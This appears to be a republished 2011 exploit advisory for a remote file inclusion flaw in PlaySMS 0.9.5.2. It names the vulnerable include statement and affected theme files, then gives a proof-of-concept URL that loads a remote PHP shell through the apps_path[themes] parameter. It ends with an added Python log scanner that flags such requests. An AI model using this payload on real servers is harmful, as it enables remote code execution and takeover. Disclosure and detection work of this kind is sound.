PlaySMS 0.9.5.2 Remote File Inclusion

Published : 2011.09.07
Credit : NoGe
Risk : High
CWE : N/A
CVE : N/A
Local : No
Remote : Yes

=============================================================================================================

[o] PlaySMS <= Remote File Inclusion Vulnerability

Software : PlaySMS ver 0.9.5.2
Vendor : http://playsms.org/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

=============================================================================================================

[o] Vulnerability

<?php include $apps_path['themes']."/".$themes_module."/header.php"; ?>

This affects all of the following files:

web/plugin/themes/default/page_forgot.php
web/plugin/themes/default/page_login.php
web/plugin/themes/default/page_noaccess.php
web/plugin/themes/default/page_register.php
web/plugin/themes/km2/page_noaccess.php
web/plugin/themes/work2/page_forgot.php
web/plugin/themes/work2/page_login.php
web/plugin/themes/work2/page_noaccess.php
web/plugin/themes/work2/page_register.php


[o] Exploit

http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]


[o] PoC

http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?
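
[o] Added example (not part of the original advisory and not PlaySMS code): a log check for the request pattern above. It flags direct requests to a theme page that set either variable used in the include statement, apps_path or themes_module, including the URL-encoded form of the brackets. The log format, sample lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Theme pages like those listed in the advisory: meant to be included by the
# application, so a direct request that also sets include variables is suspect.
THEME_PAGE = re.compile(r"/web/plugin/themes/[^/]+/page_\w+\.php$")
# Variables the vulnerable include statement builds its path from.
INCLUDE_VARS = {"apps_path", "themes_module"}
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')
URL_SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)

# Constructed sample lines (Combined Log Format prefix, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.7 - - [05/Sep/2011:10:00:01 +0000] "GET /sms/index.php HTTP/1.1" 200 911',
    '192.0.2.7 - - [05/Sep/2011:10:00:02 +0000] "GET /sms/web/plugin/themes/default/page_login.php HTTP/1.1" 200 12',
    '198.51.100.9 - - [05/Sep/2011:10:03:10 +0000] "GET /sms/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://example.invalid/x? HTTP/1.1" 200 40',
    '198.51.100.9 - - [05/Sep/2011:10:03:12 +0000] "GET /sms/web/plugin/themes/work2/page_register.php?apps_path%5Bthemes%5D=hTTp%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 40',
    '198.51.100.9 - - [05/Sep/2011:10:03:15 +0000] "GET /sms/web/plugin/themes/km2/page_noaccess.php?themes_module=default HTTP/1.1" 200 40',
]


def classify(log_line):
    """Return None, 'override' or 'remote-include' for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    if not THEME_PAGE.search(unquote(path)):
        return None
    verdict = None
    # parse_qsl percent-decodes keys and values, so %5B/%5D brackets are caught.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.split("[", 1)[0] not in INCLUDE_VARS:
            continue
        if URL_SCHEME.search(value):
            return "remote-include"  # value would turn the include into a URL
        verdict = "override"  # client supplied an include variable at all
    return verdict


def scan(lines):
    """Return (line_number, verdict) for every flagged line, 1-based."""
    hits = [(n, classify(line)) for n, line in enumerate(lines, 1)]
    return [(n, v) for n, v in hits if v]


if __name__ == "__main__":
    for n, v in scan(SAMPLE_LOG):
        print(n, v)
```

A hit only shows that the request was made; whether the include succeeded depends on the server's PHP configuration and is not visible in the access log.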

=============================================================================================================

[o] Greetz

Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{

=============================================================================================================

[o] September 05 2011 - Papua, Indonesia



Copyright 2017, cxsecurity.com